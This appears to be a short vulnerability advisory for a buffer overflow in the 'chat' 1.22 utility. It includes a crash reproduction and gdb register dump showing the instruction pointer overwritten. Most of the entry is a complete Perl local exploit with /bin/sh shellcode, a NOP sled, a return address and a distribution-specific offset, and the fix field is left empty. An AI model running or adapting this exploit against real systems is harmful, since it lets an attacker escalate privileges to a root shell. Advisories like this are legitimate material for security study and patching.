|
COMMAND chat locale buffer overflow SYSTEMS AFFECTED chat 1.22 PROBLEM securma massine [securma@caramail.com] says : chat is prone to a buffer overflow with a buffer [1056]byte root@tasanou sbin]# ./chat `perl -e 'print "A"x1056'` Segmentation fault (core dumped) [root@tasanou sbin]# gdb chat core.3261 --quiet (no debugging symbols found)... Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) info reg eax 0x804de90 134536848 ecx 0x0 0 edx 0x186a1 100001 ebx 0x41414141 1094795585 esp 0xbffe6cc0 0xbffe6cc0 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eip is overwritet exploit code: ============= #!/usr/bin/perl #greets marocit $shellcode = "x31xc0x31xdbxb0x17xcdx80" . "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" . "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" . "x80xe8xdcxffxffxff/bin/sh"; $ret =0xbfffe8e0; $buf = 1056; $egg = 6000; $nop = "x90"; $offset = 0; if (@ARGV == 1) { $offset = $ARGV[0]; } $addr = pack('l', ($ret + $offset)); for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; } for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) { $buffer .= $nop; } $buffer .= $shellcode; exec("./chat", $buffer,0); #i use offset 1640 (mandrake 9) SOLUTION ?